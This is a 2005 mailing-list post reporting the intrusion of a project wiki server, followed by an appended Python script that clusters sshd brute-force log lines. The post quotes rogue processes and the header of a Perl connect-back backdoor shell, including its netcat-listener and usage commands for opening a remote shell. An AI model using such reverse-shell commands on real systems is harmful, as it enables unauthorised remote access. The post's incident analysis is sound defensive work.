
Re: Wiki hacked?

+++ Wookey [05-09-29 17:57 +0100]:
> +++ Wolfgang Denk [05-09-29 17:11 +0200]:
> And the reason there is no debian update for it is that the debian twiki
> package is not installed. Looks like whoever installed twiki put their own
> tarball in instead of the debian package. 
> That was a mistake - leaves you exposed to security flaws down the line...

OK - it looks like there isn't a twiki package in testing (which the server
is running), which is no doubt why we have a manual install. 

> I'll change over to the debian one ASAP. If anyone knows how to do that
> without losing the current content then do feel free to stick your oar in.

I've put in the twiki package from unstable but kept the machine pinned at

Found a bit more evidence of wrongdoing:
we have these rogue www-data processes:
22605 ./bind 1234
22905 sh -c /usr/bin/rlog  -rr1.37|perl /var/tmp/backup.pl 995
22907 lpd
22908 sh -c echo "uname -a";echo "id";/bin/sh
22913 /bin/sh
22924 ./stack
22925 ./stack
22926 ./stack

the last stack is using 99% CPU and has used 4365:59 system time
and /var/tmp/backup.pl is an exploit:
# Remote Connect-Back Backdoor Shell v1.0.
# (c)AresU 2004
# 1ndonesia Security Team (1st)
# AresU[at]bosen.net
# Usage:
# 1) Listen port to received shell prompt using NetCat on your toolbox, for
example: nc -l -p 9000
# 2) Remote Command Execution your BackDoor Shell, for example: perl
connect.pl <iptoolbox> <ncportlisten>
# --------
# The supplied exploit code is not to be used for malicious purpose, but for
educational purpose only. The Authors and 
#1ndonesian Security Team WILL NOT responsible for anything happened by the
couse of using all information on these website.
# ---------

It's pointing at what looks like malaysian server port 995,
which is pop3s.

I've killed those processes and moved the files. 

There are loads of messages like:
Sep 25 14:06:14 onz sshd[15369]: Illegal user chloe from
from sep 19th to today - looks like brute-force attempt to login?
comes from servers: 21:46 to 22:01 on sep 19th, 12:31 to 13:06 on sep 20th,
13:34 to 13:43 on sep 20th, 23:14 to 23:16 on sep 21st, 11:40 to 12:26 on
sep 22nd, at 18:06 on sep 22nd, 20:30 to 20:49 on sep 22nd including a lot
of messages like
 Sep 22 20:47:12 onz sshd[8760]: reverse mapping checking getaddrinfo for
luis.spu.edu.ph failed - POSSIBLE BREAKIN ATTEMPT!
14:42 to 15:04 on sep 23rd, at 17:10 on sep 23rd
 and so on.
The original www-data failed login came from
 Sep 19 20:12:46 onz sshd[27962]: (pam_unix) authentication failure;
logname= uid=0 euid=0 tty=ssh ruser= rhost=  us
Sep 19 20:12:48 onz sshd[27959]: error: PAM: Authentication failure for
www-data from
Sep 19 20:12:59 onz sshd[27959]: error: PAM: Authentication failure for
www-data from
Sep 19 20:13:04 onz sshd[27959]: error: PAM: Have exhasted maximum number of
retries for service. for www-data from

OK - that's enough for tonight

Aleph One Ltd, Bottisham, CAMBRIDGE, CB5 9BA, UK  Tel +44 (0) 1223 811679
work: http://www.aleph1.co.uk/     play: http://www.chaos.org.uk/~wookey/
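The brute-force windows in the mail above were picked out of the sshd log by hand. As an added example (not part of Wookey's message or of the server's tooling), this Python script does the same clustering over constructed sshd lines in the same syslog format; the addresses are placeholders and the 30-minute gap threshold and the year 2005 are assumptions.

```python
import re
from datetime import datetime
# Constructed sample lines in the classic syslog format quoted in the mail
# ("Mon DD HH:MM:SS host sshd[pid]: message"); addresses are placeholders.
SAMPLE_LOG = """\
Sep 19 21:46:02 onz sshd[27101]: Illegal user chloe from 192.0.2.10
Sep 19 21:46:05 onz sshd[27103]: Illegal user admin from 192.0.2.10
Sep 19 22:01:40 onz sshd[27290]: Illegal user test from 192.0.2.10
Sep 20 12:31:11 onz sshd[3011]: error: PAM: Authentication failure for www-data from 198.51.100.7
Sep 20 12:40:15 onz sshd[3011]: error: PAM: Authentication failure for www-data from 198.51.100.7
Sep 20 13:06:58 onz sshd[3120]: Illegal user oracle from 198.51.100.7
Sep 22 20:47:12 onz sshd[8760]: reverse mapping checking getaddrinfo for host.example failed - POSSIBLE BREAKIN ATTEMPT!
Sep 25 14:06:14 onz sshd[15369]: Illegal user chloe from 203.0.113.5
"""
LINE_RE = re.compile(r"^(\w{3} +\d+ \d\d:\d\d:\d\d) (\S+) sshd\[(\d+)\]: (.*)$")
# Message patterns seen in the mail; the last capture group is the peer identifier.
PATTERNS = [
    (re.compile(r"Illegal user (\S+) from (\S+)"), "illegal_user"),
    (re.compile(r"Authentication failure for (\S+) from (\S+)"), "pam_failure"),
    (re.compile(r"reverse mapping checking getaddrinfo for (\S+) failed"), "reverse_map"),
]

def parse_events(text, year=2005):
    """(timestamp, kind, source) per matching sshd line; syslog has no year, so 2005 is assumed."""
    events = []
    for line in text.splitlines():
        if not (m := LINE_RE.match(line)):
            continue
        ts = datetime.strptime(f"{year} {m.group(1)}", "%Y %b %d %H:%M:%S")
        for pat, kind in PATTERNS:
            if pm := pat.search(m.group(4)):
                events.append((ts, kind, pm.groups()[-1]))
                break
    return events

def burst_windows(events, gap_minutes=30):
    """Cluster into bursts; a gap over gap_minutes (an assumed threshold) starts a new burst."""
    bursts = []
    for ts, _kind, src in sorted(events):
        if bursts and (ts - bursts[-1]["end"]).total_seconds() <= gap_minutes * 60:
            bursts[-1].update(end=ts, count=bursts[-1]["count"] + 1)
            bursts[-1]["sources"].add(src)
        else:
            bursts.append({"start": ts, "end": ts, "count": 1, "sources": {src}})
    return bursts

def summarise(bursts):
    """One line per burst, in the '21:46 to 22:01 on sep 19th' style of the mail."""
    return [f"{b['start']:%b %d %H:%M} to {b['end']:%H:%M}: {b['count']} events "
            f"from {', '.join(sorted(b['sources']))}" for b in bursts]
```

Running `summarise(burst_windows(parse_events(SAMPLE_LOG)))` gives one line per burst with its source addresses, which is what you want before deciding what to block or report.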
